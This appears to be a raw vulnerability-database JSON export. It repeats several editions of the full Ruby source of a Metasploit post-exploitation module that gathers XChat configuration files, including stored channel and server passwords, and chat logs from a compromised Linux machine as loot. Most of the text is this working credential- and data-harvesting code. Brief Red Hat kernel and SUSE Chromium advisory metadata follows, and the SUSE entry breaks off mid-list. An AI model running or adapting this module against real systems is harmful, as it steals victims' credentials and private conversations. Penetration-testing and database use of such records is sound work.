type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-12-31T06:01:29", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-01T09:59:18", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-01-01T09:59:18", "value": 3.6}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2018-01-01T09:59:18", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T02:16:54", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-01-20T02:16:54", "value": null}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2018-01-20T02:16:54", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T22:06:33", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2018-01-20T22:06:33", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-21T05:35:39", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2018-08-21T05:35:39", "differentElements": ["modified", "published"], "edition": 10}], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}

{"redhat": [{"lastseen": "2018-11-20T20:54:33", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-358.94.1.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "kernel-debuginfo-common-x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-358.94.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-358.94.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-358.94.1.el6", "arch": "x86_64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-358.94.1.el6.x86_64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Integer overflow in Linux's create_elf_tables function (CVE-2018-14634)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Qualys Research Labs for reporting this issue.", "reporter": "RedHat", "published": "2018-11-21T00:30:39", "type": "redhat", "title": "(RHSA-2018:3643) Important: kernel security update", "enchantments": {"score": {"modified": "2018-11-20T20:54:33", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-14634"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-11-21T00:32:34", "id": "RHSA-2018:3643", "href": "https://access.redhat.com/errata/RHSA-2018:3643", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2018-11-21T03:16:50", "references": ["https://bugzilla.suse.com/1115537", "https://bugzilla.suse.com/1112111"], "affectedPackage": [{"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "70.0.3538.102-74.1", "arch": "x86_64", "packageFilename": "chromium-70.0.3538.102-74.1.x86_64.rpm", "packageName": "chromium", "operator": "lt"}, {"OS": "SUSE Package Hub for SUSE Linux Enterprise", "OSVersion": "12", "packageVersion": "70.0.3538.102-74.1", "arch": "x86_64", "packageFilename": "chromedriver-70.0.3538.102-74.1.x86_64.rpm", "packageName": "chromedriver", "operator": "lt"}], "description": "This update contains Chromium 70.0.3538.102 and fixes security issues and\n bugs.\n\n Vulnerabilities fixed in 70.0.3538.102:\n\n - CVE-2018-17478: Out of bounds memory access in V8 (boo#1115537)\n\n Vulnerabilities fixed in 70.0.3538.67 (bsc#1112111):\n\n - CVE-2018-17462: Sandbox escape in AppCache\n - CVE-2018-17463: Remote code execution in V8\n - Heap buffer overflow in Little CMS in PDFium\n - CVE-2018-17464: URL spoof in Omnibox\n - CVE-2018-17465: Use after free in V8\n - CVE-2018-17466: Memory corruption in Angle\n - CVE-2018-17467: URL spoof in Omnibox\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n - CVE-2018-17469: Heap buffer overflow in PDFium\n - CVE-2018-17470: Memory corruption in GPU Internals\n - CVE-2018-17471: Security UI occlusion in full screen mode\n - CVE-2018-17473: URL spoof in Omnibox\n - CVE-2018-17474: Use after free in Blink\n - 